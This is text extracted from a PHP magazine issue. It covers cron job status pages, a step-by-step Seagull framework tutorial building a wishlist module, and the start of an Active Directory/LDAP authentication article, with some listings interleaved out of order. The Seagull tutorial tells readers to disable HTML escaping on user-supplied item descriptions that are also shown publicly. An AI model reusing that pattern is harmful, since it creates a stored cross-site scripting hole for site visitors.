JavaScript Generation Page The part of this system that gives the page the most flash is the JavaScript. The code, itself, is very easy to pull off. You run a SELECT query on the job_status table to produce rows of data. The data from those rows are output as arguments for number of parent.UpdateStatus() statements; one for each row. The resulting calls are bundled into a SendStatusUpdates() function that is executed by the HTML body’s onLoad event (see Listing 6). When this page is loaded into the iframe, it calls UpdateStatus() in the parent page (the main status page). One thing to note: because of the XSS (cross-site scripting) risks, parent pages and their child frames can only communicate with one another if they are of the same domain. Volume 4 Issue 11 • php|architect • 29
Job Management with PHP & Cron This page is regenerated via a meta-tag refresh. How often this happens is at your discretion. Each refresh will incur a small amount of server load. In my example, the meta-tag refreshes roughly every 30 seconds. My code considers the number of rows it will update. Its count becomes the number of seconds ($timing++). After creating the parent.UpdateStatus(...) statements, it uses $timing = max(2,(10 - ($timing * 2))); to derive a variable that is between 2 and 10, and it uses that as the refresh interval (in seconds).
The Log Viewer If you have selected to build this tool with the logging functionality, include the code for the log (Listing 7). From the admin/display page, include a link to “View Log”. This will spawn a new page that contains the relevant log entry. The log viewer generates a list of log entries that match the job_id that was passed to the log viewer as a variable in the query string. This log is intentionally brief and simple so that the script can be tweaked out in any direction. Rather than display and hide a table of editing material, this space could hold an iframe of content or a flash movie—or both.
Conclusion Jobs can be set up to run at a particular time of day. When the cron job and the time value for a job coincide, that can trigger the job. Once the job has been processed, time and cron job may coincide again, but the status will have changed and so the job would not run again. Aborting an operation that is currently underway is not a good idea, but such functionality could be added. If the application works with a database capable of committing transactions, blocks of operations could be rolled back when a process is aborted. This tool can be used to encapsulate large admin tools and lengthy jobs; or put a layer of protection between the client and applications in use.
MIKE DeWOLFE is a developer for international aid organization, the Communications Initiative (http://www.comminit.com/). He can be contacted via http://mike.dewolfe.bc.ca/ (you’ll have to forgive him for hosting his site on Microsoft platform).
Volume 4 Issue 11 • php|architect • 30
FEATURE
Flying with Seagull
FLYING WITH
SEAGULL Last month we gave you an introduction to Seagull. We continue this month with a step-by-step guide for setting up an example website. Two to three years of PHP experience and familiarity with Object Oriented programming is recommended. by WILLIAM ZELLER and WERNER M . KRAUSS
A
web framework is a necessity when developing a serious website. Programmers should not recreate basic web elements when great tools to help them get the job done already exist. One of these tools, Ruby on Rails, garnered much attention when it was released in July 2004. It simplified Ruby development, separated data from display, and made web development fun. In the last issue, and Part 1 of this article, we introduced the Seagull Framework, and covered its basics. This month, we’ll walk through a practical example of how to deploy these new skills.
PHP: 4.1, better 4.3, also works with 5 OTHER SOFTWARE: Database: MySQL, PostgreSQL and Oracle are supported, but theoretically all databases supported by PEAR::DB (e.g. MSSQL, SQLite or ODBC) can be used without problems LINKS: http://seagull.phpkitchen.com http://seagull.phpkitchen.com/apidocs/ http://pear.php.net/package/HTML_Template_Flexy CODE DIRECTORY: seagull2
Creating an Example Module To demonstrate how to extend Seagull, we’re going to give a detailed example of creating a custom module. The module we’ve chosen is a “wish list” module. A user will be able to sign up and add/edit/delete items from his wish lists. Guests will be able to view the contents of a user’s wishlist and notify the system if they’ve bought an item on the list. This example covers the basics of module creation and we hope will be an enjoyable site to
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/265 create. But first one more piece of theory: Seagull provides a validate/process/display workflow, which simply means that all data that passes through the system must be filtered by the following methods: Volume 4 Issue 11 • php|architect • 31
Flying with Seagull
• validate: The raw $_REQUEST is passed in to this method, validations are performed, and acceptable data is mapped to an $input object. • process: If all data is valid, the $input object is passed to the process method, which redirects to the relevant action method. Once data has been manipulated, it is mapped to an $output object. If one or more validations have failed, all data is deemed to be invalid, and is passed directly to the display() method with appropriate error messages. This will most likely be presented back to the user for correction. • display: This takes the data, whether valid or invalid, adds a few system properties like execution time, etc., and sends it to the template engine for rendering into HTML. The first step to create the wish list modules is to create the table in our database to store users’ wish lists. The SQL for this can be found in Listing 0. Go to Modules->Maintenance, click “Rebuild Dataobjects Now.” This will create a file in [path-to-seagull]/var/cache/entities/ called Wishlist.php. Now we need to create our module. You can either choose a module that is similar to your needs and modify it, or begin with a new one. In the former case, just copy the old module files and directories and rename them as needed. In the latter, you can either start from scratch or use the “Module Skeleton Generator.” This functionality is not meant for creating the complete module (that is not yet possible). But it creates the basic structure using a simple form, including directories for classes, translations and templates, and some basic files for your new module. Go to the “Create a module” section of the Modules>Maintenance tab and select all the checkboxes except Create Templates (check add, edit, insert, ini file, etc). Enter Wishlist for the module name and WishlistMgr for the manager name. You will need to make sure the [path-to-seagull]/modules/ directory is writable. If these steps were performed successfully, you will now have the following files: /seagull/modules/wishlist/conf.ini /seagull/modules/wishlist/classes/WishlistMgr.php
and an empty directory: /seagull/modules/wishlist/lang/
Open /seagull/modules/wishlist/classes/WishlistMgr.php and you will see the contents of Listing 1.
LISTING 0 1 CREATE TABLE `wishlist` ( 2 `wishlist_id` int(11) unsigned NOT NULL auto_increment, 3 `uid` int(11) unsigned NOT NULL default ‘0’, 4 `name` varchar(50) NOT NULL default ‘’, 5 `url` varchar(255) NOT NULL default ‘’, 6 `description` mediumtext NOT NULL, 7 `cost` float NOT NULL default ‘0’, 8 `priority` tinyint(1) NOT NULL default ‘0’, 9 `bought` tinyint(1) NOT NULL default ‘0’, 10 PRIMARY KEY (`wishlist_id`) 11 ) TYPE=MyISAM;
First, take a look at the WishlistMgr() method (the constructor WishlistMgr class). Notice the line: SGL::logMessage(null, PEAR_LOG_DEBUG);
This line is in every method of Seagull modules, allowing Seagull to display intelligent error messages in the log placed in [path-to-seagull]/var/log/. The next three lines set the default values for the module. If no action is specified, the title of the page will be “Wishlist Manager” and will use the template “WishlistList.html”. The _aActionsMapping variable is the most interesting part of the constructor. It’s an associative array which maps actions to their respective methods. For example, the following line tells Seagull that the action “add” should call the method “_add()”. ‘add’ => array(‘add’)
This is an extra level of security that ensures Seagull doesn’t assume every method in the class is a callable action. The second argument of the array is optional, and tells Seagull to redirect to a page after performing some action. So the following line calls the delete() method, then redirects to the special action “redirectToDefault” (which happens to be “list”). ‘delete’ => array(‘delete’, redirectToDefault’),
If one wanted to redirect to the add action after deletion, one would simply change that line to: ‘delete’ => array(‘delete’, ‘add’),
Using this system, you can add as many actions as you want to Seagull. Let’s move on to the validate() method. It begins by setting $this->validated to true. If we find errors during validation, this will be set to false and Seagull will know to stay where we are and display an error message. The next few lines set $input values to their default. $input->action = ($req->get(‘action’)) ? $req>get(‘action’) : ‘list’;
The above line says “If there’s an action, use that action. If not, use list.” This line is what makes list the default action for the module. The if statement in validate() checks to see if errors have occurred. If they have, it creates a warning message and tells Seagull that the data is invalid. The action methods (_add(), _insert(), _edit(), etc) are currently stubs and ready for our own wishlist code.
Volume 4 Issue 11 • php|architect • 33
devshed
devshed
Flying with Seagull
Listing Items on the Wishlist First, let’s create the wishlist listing. This is an editable list of every item on a user’s wishlist. In the _list() method, we’ll grab the necessary data to list items on the wishlist. Then we’ll create a listing template and tell it how to access the data we’ve accumulated. We’ll need the Wishlist class that Seagull created for us, so at the top of the WishlistMgr.php file, put the following line. require_once SGL_ENT_DIR . ‘/Wishlist.php’;
And we use the _list() method from Listing 2. On line 5, we create a new DataObjects_Wishlist object, using the class created for us by Seagull. On line 6, we set the wishlist’s uid (user id) to the uid of the currently logged in user. This ensures that only the user’s wish list items are listed on this page. On line 7, we call the find() method, which finds all rows in the database matching the current wishlist object. In this case, that means searching for all wishlist items where the uid matches the current user’s uid. On line 8, we create a new array to hold the wishlist items. On line 9, we check to see that we have at least one wishlist item, and on lines 10 through 14, we use a while statement to loop over results of the query. We add each result to our items array, cloning the object to ensure data isn’t lost when $wishlist->fetch() is called again. Lastly, on line 16, we make the items array accessible from our template. The data acquisition of the wishlist listing is complete, but we haven’t specified how we want that data displayed. To do that, we need to create a template. Save Listing 3 to [path-to-seagull]/www/themes/ default/wishlist/WishlistList.html. In Flexy, the template system used by Seagull, variables can be accessed as {var}. Similarly, functions can are accessed by calling {foo()}. On line 4 of Listing 3, the translate() function is called with the pageTitle argument. We can access the pageTitle variable because we set $input->pageTitle in the validate() method. $input is mapped to $output (see the validate/process/display explanation above for the reason why). The translate function takes a string argument, which it translates in the template using the files in our [path-to-seagull]/modules/wishlist/lang directory. It can take either another variable or text itself. To translate text, the {translate(#text to translate#)} syntax needs to be used. This is done on lines 18-24 to print the table headers. Note that the translate() function in the templates is only used for GUI information, not content. Line 5 contains {msgGet()} which leaves space for any
Flying with Seagull error or status messages we may need to print. Next, we have a simple table; after the headers is a foreach statement. It is terminated on with an {end:} statement. The lines {foreach:items,key,item} ... {item.name} ... {end:}
are equivalent to the following PHP code: foreach($items as $key=>$item) { echo $item->name; }
Next, we call the switchRowClass()function which alternates colors for our table rows. Then, we simply output the variables in the table and finally provide the ability to delete multiple items.
Language Files Every Seagull module contains one or more language files. The language file is stored in the [path-to-seagull]/modules/[module]/lang/ directory, and the default language file is english-iso-8859-15.php. This is a php file which contains an associative array that maps words and phrases to their English translations. For our wishlist module, the language file will look like Listing 16. Put Listing 16 in a file named english-iso-8859-15.php and store that file in the [path-to-seagull]/modules/wishlist/lang/ directory. When the translate() method is called with an argument, Seagull looks to see if the argument exists as a key in the $words array. If it exists, the value of that element is used in the template. If the key cannot be found, the key is printed surrounded by “>” and “<”. This is an indication that any text between “>” and “<” should be added to the language file.
Configuration Files Each module contains a configuration file called conf.ini which exists in the [path-to-seagull]/modules/[module]/ directory. This is an ini file which contains module specific options determined by the module developer. These options can be easily changed without digging through code. They can be accessed by the module using: $conf = & $GLOBALS[‘_SGL’][‘CONF’];
This puts every module’s configuration in the $conf variable.
By default, the wishlist conf.ini file contains the WishlistMgr directive with the requiresAuth variable. This can be accessed with the following, for example: if($conf[‘wishlistmgr’][‘requiresAuth’]) // ...
Note that every manager class of your module needs its own section in this conf.ini file, otherwise Seagull will throw an error.
Registering the Wishlist Module Seagull provides a module management system where we can view and edit all the modules in our Seagull installation. In order for Seagull to know that we’ve added a new module, we need to add it to the system. To add our wishlist module, go to Modules -> Manage and hit the Add a module button. Fill out the form with name (“wishlist”), title (“A simple wishlist manager”), configurable (“yes”), description (this text will be used in the Module Manager to describe this module), the admin URI and an icon filename. If you don’t have an icon for your module yet, just use an existing icon like faqs.png. After clicking the Add button, we see the Module Manager screen again. You will see the wishlist manager at the end of the list of modules. Clicking on this listing leads us to the admin section of our wishlist module.
Linking to the Wishlist Seagull’s
URLs
take
the
form
of
http://seagull-example.com/index.php/module/action/.TheURL for our Wishlist module would be /index.php/wishlist/.
You can type that into your browser each time you want to view the page, but we can create a navigational link to make it easier (and to let a user know where he can find his wishlist). To create a link, go to Modules->Navigation>New Page. Enter “Wishlist Manager” as the title and make the parent page “Top Level”. Select “dynamic pages” next to page and a list modules will appear. Click the “wishlist” module. Then go to “check to activate” and under “can view,” select the roles “root” and “member” (You can select multiple items by holding down control when selecting). A link will be displayed at the top of your screen. You can change its position by clicking the up and down arrows on the page manager screen which is where you should redirect after adding a new page. Clicking on “Wishlist Manager” should display this table. We haven’t added any items yet, so it will be empty and quite boring. Let’s spruce things up a bit by adding some items to our wishlist. Figure 1 shows an example wishlist.
function validate($req, &$input) { SGL::logMessage(null, PEAR_LOG_DEBUG); $this->validated = true; $input->error = array(); $input->pageTitle = $this->pageTitle; $input->masterTemplate = $this->masterTemplate; $input->template = $this->template; $input->action = ($req->get(‘action’)) ? $req->get(‘action’) : ‘list’; $input->aDelete = $req->get(‘frmDelete’); $input->submit = $req->get(‘submitted’); $input->item = (object)$req->get(‘item’); $input->wishlist_id = $req->get(‘wishlist_id’); if($req->get(‘submitted’)) { if(empty($input->item->name)) $aErrors[‘name’] = ‘Please enter a name for this item’; if(empty($input->item->description)) $aErrors[‘description’] = ‘Please enter a description for this item’; if(empty($input->item->cost))
Adding Wishlist Items Figure 2 shows the add page. To add items, we’ll need to create a new action called add, not surprisingly. In Listing 3, we created a link to the action on line 13, but clicking on it will do nothing because we haven’t create an add action, yet. We’re going to do that now. Listing 4 shows the add method. Line 4 sets the page title, line 5 sets the template file, and line 6 sets the action. We’re setting the action here and not in the template because we’re going to use the same template for both the add and edit items. Line 7 populates the select box with available priorities, which are retrieved from the language file. Now let’s take a look at the template for the add action. Save Listing 5 to /seagull/www/themes/default/ wishlist/WishlistEdit.html. This code begins by checking to see if a wishlist_id exists (if it does, this means we’re editing an existing wishlist item, otherwise we’re creating a new one). Next, we leave room for the title of the page and error messages. A table is then created and a row given for each input element. Above each element we have a flexy:if statement inside a
tag. So this tag is only
$aErrors[‘cost’] = ‘Please enter a cost for this item’; if(!is_numeric($input->item->cost)) $aErrors[‘cost’] = ‘Please enter the cost as a number’; } // if errors have occured if (isset($aErrors) && count($aErrors)) { SGL::raiseMsg(‘Please fill in the indicated fields’); $input->error = $aErrors; $this->validated = false; $input->template = ‘WishlistEdit.html’; if($input->action == ‘insert’) $input->pageTitle = ‘Wishlist Manager :: Add’; if($input->action == ‘update’) $input->pageTitle = ‘Wishlist Manager :: Edit’; $input->priorities = SGL_String::translate(‘priorities’); } }
function _update(&$input, &$output) { SGL::logMessage(null, PEAR_LOG_DEBUG); $wishlist = & new DataObjects_Wishlist(); $wishlist->uid = SGL_HTTP_Session::getUid(); $wishlist->get($input->item->wishlist_id); $wishlist->setFrom($input->item); $success = $wishlist->update(); if ($success !== FALSE) { SGL::raiseMsg(‘Wishlist item saved successfully’); } else { SGL::raiseError( ‘There was a problem saving the wishlist item’, SGL_ERROR_NOAFFECTEDROWS ); } }
displayed if an error exists for this element. The rest of the template is a simple form for inputting the data we need for the wishlist item. We have now a page that allows a user to enter a new item into our wish list, but we haven’t added any code to actually insert the item into the database. So, let’s modify the validate() and insert() methods to do this for us. In validate(), add the following line after the line containing $input->submit = ...: $input->item = (object)$req->get(‘item’);
This takes the values in our form (item[name], item[url], etc) and creates an object ([item->name, item->url, etc.). Replace the _insert() method in the WishlistMgr class with the code in Listing 6. Here, we create a new Wishlist object, then copy the values from $input->item using the setFrom() function. Then, we simply set the user’s id (uid) and call $wishlist->insert(), which inserts the new wishlist item into the database. This is one of the best examples of why Seagull is such a joy to use. There’s no need to handle user input ourselves or even to write our own Volume 4 Issue 11 • php|architect • 38
Flying with Seagull SQL. In three lines of code we can populate an object with user submitted values and insert a new row into the database. If you can become accustomed to this new way of doing things now, it will save you a huge amount of time when developing websites in the future.
Handling User Input To demonstrate Seagull’s error handling features, let’s add some validation to this input by changing the validate() method to the code found in Listing 7.
priority? We need to be able to edit wishlist items, which we can do by creating an edit action. Listing 8 shows the edit() method. We set the page name, template and action. Next we use the find() method to search for all wishlist items with the wishlist_id that was submitted, and the uid of the current user (we wouldn’t want someone to edit someone else’s wishlist!). The find() method takes an optional argument called autoFetch which populates the wishlist object with the first row it finds. No more than one row can be returned
Seagull provides a module management system where we can view and edit all the modules in our Seagull installation. First, we check to see if the “submitted” variable has been set (this is set in the add template). If so, we do various checks on the data. We make sure the values aren’t empty and ensure the cost is a numeric value. If there are any errors, we set the appropriate value in the $aErrors array. We add code in the if statement to tell Seagull to return to the appropriate page and display errors based on the current action.
Editing Wishlist Items Now we can add wishlist items, but what happens when we decide that not only do we want a new McLaren F1, but we must have one, and want to change the item’s
in this case because we’re searching with wishlist_id, which is a primary key (and therefore unique). Next, let’s create an update action in order to save the changes we’re making to wishlist items. Replace the current update() method with Listing 9. It’s almost identical to the insert() method, except that we retrieve the item from the database to ensure that the user has the authority to edit it and also to populate it with existing values that we’re not editing (such as whether or not the item has been bought). update() returns the number of affected rows when successful and a boolean false when unsuccessful. Therefore, we must check $success !== FALSE to ensure we’re not interpreting 0 as FALSE.
FIGURE 1
Volume 4 Issue 11 • php|architect • 39
Flying with Seagull FIGURE 2
Deleting Wishlist Items The last step of managing wishlist items is creating a delete action. The delete() method is listed in Listing 10. To delete items from the wishlist, we simply loop over the items submitted for deletion, retrieve each one from the database and call delete() on the wishlist object. Let’s get some practice editing these actions we’ve created by cleaning things up a bit. As you add and edit wishlist items, you may notice that descriptions are only displayed on one line. We can fix this easily. Add the following line, immediately after the while loop in the list() method. $wishlist->description = nl2br($wishlist->description);
This converts all new lines in the description to HTML line breaks (the tag). Change {item.description} to {item.description:h} in WishlistList.html. Putting :h after any variable tells Flexy to not escape HTML tags. The Priority and Bought fields are currently displayed as integers. This is readable but ugly. To beautify the Priority column, add this line after the call to SGL::logMessage in list(). $priorities = $this->getPrioritiesList();
In the same method, add the following line, after $wishlist->description = ... in the while loop. $wishlist->priority_str = $priorities[$wishlist>priority];
This replaces the priority with its string representation. To beautify the Bought column, change {item.bought} in WishlistList.html to this: {if:item.bought} Bought {else:} Not Bought {end:}
Wishlist management is complete! Now we need to add a publicly viewable wishlist page.
The Public Wishlist Page Figure 3 shows the public wishlist page. Let’s call this new action listPublic. We’ll need to create a new method as well as a new template page. We also need to tell Seagull that we want to use this new action. In the WishlistMgr() constructor, add the following, after ‘list’ => array(‘list’): ‘listPublic’ => array(‘listPublic’)
Next, add the method in Listing 11 to the WishlistMgr class. When a user puts his wishlist online, others need to know how to send the items on the list to the owner. In listPublic(), we have added code to create a user object and fill it with values based on the owner of the wishlist. We have done this by using the DataObjects_Usr class, which we can manipulate just like we manipulate the DataObjects_Wishlist class. We use this information to print out the user’s address information. To use the DataObjects_Usr class, you need to add the following line after require_once SGL_ENT_DIR . ‘/Wishlist.php’;, at the top of your script require_once SGL_ENT_DIR . ‘/Usr.php’;
You’ll also need to add $input->uid = $req->get(‘uid’);
after $input->wishlist_id = $req->get(‘wishlist_id’);
in the validate() method. Notice that the remaining code is very similar to the code in list(). The two main differences are that it only lists wishlist items that have not been bought and the items are ordered by priority. Save Listing 12 to [path-to-seagull]/www/themes/ default/wishlist/WishlistListPublic.html
Volume 4 Issue 11 • php|architect • 41
Flying with Seagull We need a method that a user can trigger to indicate that they’ve bought an item on a user’s wishlist (we wouldn’t want him getting five copies of the same book). Let’s call this method hasBeenBought(). This method simply changes the bought value of a wishlist item to TRUE. Add this line, after ‘listPublic’ => ... in the WishlistMgr() constructor: ‘hasBeenBought’ => array(‘hasBeenBought’, ‘listPublic’)
Then, add the method in Listing 13 to the WishlistMgr class. The site is almost finished!
Listing All Users’ Wishlists Let’s add one more very simple page that links to each user’s wish list. Add the following line after hasBeenBought]... in the WishlistMgr() constructor. ‘listUsers’ => array(‘listUsers’)
Add the method in Listing 14 to your WishlistMgr class. It simply iterates over every user and should be easy to follow. The template is similar to the others and should be easy to follow. Save Listing 15 to [path-to-seagull]/www/themes/ default/wishlist/WishlistListUsers.html. Finally, let’s add a link to the list of users to the navigation bar. Go to Modules->Navigation->New Page, enter “Wishlists by User” as the title, click dynamic page, click wishlist and enter “action/listUsers” as the “Additional Params”. Click the “check to activate” button and give access to all users (guest, members and admin).
You now have a fully featured wishlist and should be able to take what you’ve learned from this tutorial and create your own sites quickly and easily with Seagull.
Wishlist Permissions If a user other than root wants see the wishlist, he gets the error You do not have the required perms to perform this action. What’s wrong? We have not added the new permissions for this module to the system. This is very easy to do: after selecting the manage permissions button from User & Security module, we hit the detect and add button, select all permissions for our wishlist module and add them to the permission list with one more click. Now, we can add the new permissions to roles. For example, Guest will be given wishlistmgr_listPublic, so he can view all wishlist items. This will work after you logout or close the browser, because permissions are stored in a cookie which lasts the lifetime of the browser’s session. Members should also be able to add and update their own wishlists. But, merely adding the permissions to the role doesn’t give existing users these rights. What’s wrong? Permissions are not retroactive, so we need to sync the current roles. This is a simple as clicking “sync perms with role”. You can select the users you want to sync, if you want to sync them with the current or another role and if you want to add missing permissions, delete extra permissions, or both. Using this tool can help you keep the rights management up to date.
‘Cost’=>’Cost’, ‘Bought’=>’Bought’, ‘With selected items(s)’=>’With selected items(s)’, ‘URL’=>’URL’, ‘Add New Wishlist Item’ => ‘Add New Wishlist Item’, ‘Wishlist item added successfully’ => ‘Wishlist item added successfully’, ‘There was a problem adding the wishlist item’ => ‘There was a problem adding the wishlist item’, ‘Wishlist item saved successfully’ => ‘Wishlist item saved successfully’, ‘There was a problem saving the wishlist item’ => ‘There was a problem saving the wishlist item’, ‘That user does not exist’ => ‘That user does not exist’, ‘Wishlist item deleted successfully’=> ‘Wishlist item deleted successfully’, ‘Please enter a name for this item’ => ‘Please enter a name for this item’, ‘Please enter a description for this item’ => ‘Please enter a description for this item’, ‘Please enter a cost for this item’ => ‘Please enter a cost for this item’, ‘Please enter the cost as a number’ => ‘Please enter the cost as a number’, ‘priorities’=> array(1=>’Would love to have’, 2=>’Would like to have’, 3=>’Wouldn\’t mind having’), ); ?>
Using Blocks The Block module allows you to easily add content blocks to your site. Examples of some of the blocks shipped with Seagull are: site news, login, random messages or category navigation. You can reach the Block Manager via Manage Modules -> Blocks. New block types can be added by putting a file containing the new class into the modules/block/classes/blocks directory. When editing the block information, the Name parameter of the block corresponds to the PHP file you want to use for content rendering. If you want to, for example, add the login block delivered with the Seagull distribution, you have to activate it in the administration screen of the block module. You can edit the title of the Block, the CSS class for displaying it, whether it’s shown on the left or right side and in which sections the block should appear. An— of course—you can edit the order of the blocks. Let’s add a custom block for our new wishlist module. For this, we have to add a new block class to modules/block/classes/blocks/ as shown in Listing 16. Note that the class name must be the same as the file name, otherwise Seagull cannot instantiate the block. In the init() method, we just call two other methods: retrieveAll(), which gets the 5 most recent items from the database and toHtml(), which formats the items nicely. Listing 17 contains these retrieveAll() and toHhtml() methods. Copy these to your WishlistBlock.php file. At last, we have to add our new block class to Block Manager’s New Block form: fill in name (WishlistBlock) and title (Wishlist), which sections it should appear in, and its position. Then hit “submit” and the block details will be saved, but by default, the block will not be active. So, we hit edit again and check the activated checkbox. Now, you will see the new block.
Modifying the Look and Feel Our site still looks like a fresh installation of Seagull. No problem, this is very easy to solve. You just have to change two or three files and soon it will look very different. To create your own look and feel, you need to add your own theme by creating a new directory in the seagull/www/themes directory, e.g. seagull/www/themes/myTheme. Copy the default module’s templates from www/themes/default/default/ into your new theme directory www/themes/myTheme/default/, and do the same with the css and images directories. The other templates don’t have to be copied to your new theme if you don’t want to change them. Seagull automatically
uses the default theme for templates not found in your new theme directory. You can change much of the layout by simply editing the CSS in the style sheet, without any need to create a new theme. Editing the CSS is both simpler and ensures that the templates remain up to date if a change is made in the module’s template. You may wonder why you should make a new theme if you only want to change one or two files. The reason is that it’s better to separate your changes from Seagull’s default code, so you can update the framework to a new version more easily without touching the changes you’ve made made. Let’s change the following two files in your theme’s default folder: banner.html and footer.html. There is also a file called header.html, however this contains everything from the first tag until the end of the opening tag and does not need to be modified. You can also modify the main CSS file: seagull/www/themes/myTheme/css/style.php. Activate the new theme by adding it to the global preferences: change the theme preference’s value to the name of your new theme directory, e.g. myTheme, and voilà—you can see the new layout you have created by just modifying two or three files. To see what’s possible by doing nothing but modifying themes, have a look at the Seagull homepage and try out the theme switcher.
Conclusion We’ve tried to make this tutorial as easy to follow as possible. If you have successfully created the wishlist module, you will be able to create almost any site you need using the Seagull Framework. By following the design constraints imposed by Seagull, you will have a site that can connect to multiple databases, a site that’s modular and easy to update and modify, and a site that is easily translatable. Welcome to the world of fast web development!
WILLIAM ZELLER is currently a senior at Trinity College in Hartford, CT. He has worked with PHP for over seven years and has contributed to various open source applications. WERNER M. KRAUSS joined the Seagull developer community in the spring of 2004, when searching for a good framework that he could use for his projects. He now maintains the project’s documentation wiki. In his free time, he loves to play the guitar in different bands. He can be contacted at: [email protected]
Volume 4 Issue 11 • php|architect • 44
FEATURE
User Management with Active Directory
User Management with Active Directory Active Directory (AD) can often be found in the installation of Microsoft Windows Server 2003 whenever it is set up as a domain. This article can be used to assist you, the programmer, when accessing, inserting, or altering objects within an AD structure. by CHAD R . SMITH
T
his article has been broken into four sections in order to make it easier for you to find your section of interest. First, I am going to give you so much information about Active Directory (AD) it will make your head spin! If you’re not a beginner in AD, feel free to skip this section and move to later parts of the article, which are intended for more advanced programmers. For all of you new programmers that are just beginning your work within AD, or if you’re a bit rusty in this area, this first part is an absolute must read. The second part of this article will then walk you through some code samples concerning how to get information out of AD. In addition, I’ll show you how to authenticate the user just as Microsoft does each time the user logs into the domain. In section three, I will go through the process of pulling information from AD, and I will show you how to add or alter existing information. In the final section, I will provide some simple advice on how to implement what I’ve covered into your existing code.
All About Active Directory Active Directory is an LDAP-based directory service that was developed by Microsoft in order to replace the flat structured Windows NT domain. This system was made in an attempt to provide a more flexible and robust network operating system. Limitations imposed by the flat structured NT domain setup, such as poor replication between domain controllers over high-latency or low-bandwidth links, and the lack of delegation of administration. In order to solve these problems, Microsoft created an LDAP-based directory service, which limited the number of objects that could
PHP: 4.x.x compiled with LDAP extension O/S: Any that can run a server with PHP OTHER SOFTWARE: Windows Server 2003 Active Directory with DNS support enabled. LINKS: ht t p : / / w w w. c o m p u t e r p e r fo r ma nc e. c o . u k / L o go n / LDAP_attributes_active_directory.htm http://www.rfc-editor.org/rfc/rfc2251.txt http://www.microsoft.com/resources/documentation/ WindowsServ/2003/standard/proddocs/en-us/Default. asp?url=/resources/documentation/WindowsServ/ 2003/standard/proddocs/en-us/ad_server_role.asp http://www.developer.com/open/article.php/10930_ 3100951_2 http://www.mozilla.org/directory/standards.html http://php.net/manual/en/ref.ldap.php http://www.oreilly.com/catalog/actdir2/index.html
CODE DIRECTORY: activedir TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/266 This code was tested on Microsoft Windows Server 2003 Enterprise and Standard setups; both were installed with Active Directory and no settings were changed. Extra items that were installed were Apache 2.0.54, PHP 4.4; nothing else was added or changed from the original configuration. LDAP has been part of PHP since its inception in PHP 3; therefore, it is available under any current PHP version.
Volume 4 Issue 11 • php|architect • 45
User Management with Active Directory be created within a domain. Microsoft’s Windows 2003 Server Active Directory supports not only the baseline components of LDAP compliance, but also extends this baseline by providing support for the informational and proposed RFC’s of LDAP (see links 1 and 2). In my AD environment, I set up a very basic arrangement that consisted of one Microsoft Windows Server 2003 setup, which I configured as a domain controller, and an AD server. In addition, I installed Apache 2.0.54 and running PHP 4.4.x compiled with the LDAP extension. For the test environment my DNS/ domain name was 50marketing.com. For my production environment there were other considerations to take into account, such as how many people would be accessing the domain and how many would be accessing it through the web. Setting Up Windows Server 2003 as a Domain Controller, a tutorial developed by Microsoft (link 3), is a useful resource. Select the best option for the type of environment you want to setup. The configuration in this article was only intended for a limited test environment and not for an actual production environment. In “real-world” situations, it would be a bad idea to set up your Domain Controller and Web Server on the same machine. This is because, if the web server was hacked into or altered in any way, then your Active Directory server would not be accessible to users. This could create a great deal of trouble if the domain is down without warning to users. In particular, large enterprise environments should take heed of this warning. Not to worry, there is still plenty more to learn about how AD does its business and how to set up a proper installation that meets your business’s needs. Personally, I found the installation of AD on Windows Server 2003 to be very simple and direct. Remember; I did not alter anything during the installation of AD on the server in order to make this work. One of the ideas behind AD was to provide a central repository that contained information about users, computers, groups, printers, applications, etc. This data is stored in a hierarchical fashion, similar to a file structure, with each entry referred to as an object class. Although there are a few different types of objects, concentrating and giving examples for accessing user and computers class objects is the focal point. Even though each class contained its own set of associated attributes, classes share some common ones as well. For example, if you want to obtain the user account name or computer name of an object, the sAMAccountName attribute would be included in your query. The attribute name would also produce an example of an NT username. With every example I used “chadsmith”, and the fully
qualified name was “[email protected]” or in some cases “CN=chadsmith,CN=Users,DC=50marketing,DC= com”. Since each object has a significant number of attributes associated with it, I suggest consulting MSDN, Google, or using the ADSI Edit utility provided with the Windows 2003 Server support kit to view the various object attributes. Other examples can be found in the further reading section. Some of the more commonly used attributes of a user object are sAMAccountName, description, email, memberOf, and sn. These attributes indicate the user account name, the description of the account, email address, groups, and the user’s last name, respectively.
Make Our First Active Directory PHP Connection Now, with AD basics covered, we have arrived at the programming part of the article. Imagine never having to write another “Lost Password” type of page, not needing to write a database table to track all the user passwords, or not even having to record the last time users logged into the system. How about not having to keep track of user permissions, via a complex system? Sounds pretty good, right? Well keep on reading because this is the main drive behind this article. Personally, I was tired of writing pages to change passwords, retrieving questions about users’ pets or sending emails because a user forgot his password. Because AD can be used for authentication, it takes security to a whole new level, forcing Microsoft’s software to do the password authentication, and not your own system. Some have recommended putting this system on an Intranet, but keep in mind that it can be done through the Internet, and, as always, having SSL set up for passwords is never a bad idea. With AD fully implemented into your upcoming or existing applications, your users will only be required to remember a single password that will work for all integrated systems. One password makes administration a snap when everything is in one place and is in a secured environment. With PHP and AD working together, you can see what groups to which a user belongs, and you can even use AD to administer these groups. There is now no need for a separate database to keep track of who is part of which group. Now, let’s get to the code. Please note that there are no comments so that I can save space within this article. Fully commented code examples can be found in the code archive. Volume 4 Issue 11 • php|architect • 46
User Management with Active Directory
Your First Active Directory Connection Active Directory is very “picky”; it needs to be initialized before it will allow any actions to be taken with it or taken against it. In order to perform AD-related activities, you must get a connection to the server and send it proper credentials. Setup for this task is easy. First, you need the IP or host name of the server where AD is located. Then, you need to provide it a valid user and password. Breaking down this code (Listing 1) is really quite simple. The connection-establishing code must be understood, first, because it is the foundation of all the code samples not only in this article, but for all the other AD topics that have to deal with PHP. The ldap_connect()function will attempt to get a connection to the LDAP server. If successful, it returns a resource_id. Next, ldap_bind() will attempt to authenticate that resource_id with the server by passing the username and password. In other words, the system will ask AD if the username and password provided are correct. If so, the system will return true and the function will, in turn, return true. Simply put, this script should output “User Authenticated”. Other possible outputs are “User NOT Authenticated” and “Fatal error: Call to undefined function: ldap_connect()”. If you get a message like these, obviously, something is wrong. The first error, indicates that the username and/or password are not valid. The second indicates that PHP’s LDAP extension is incorrectly installed.
Retrieving User Information Now that we’ve established a connection, let’s grab more information from AD. Imagine that you would like to pre-fill a form with FIGURE 1
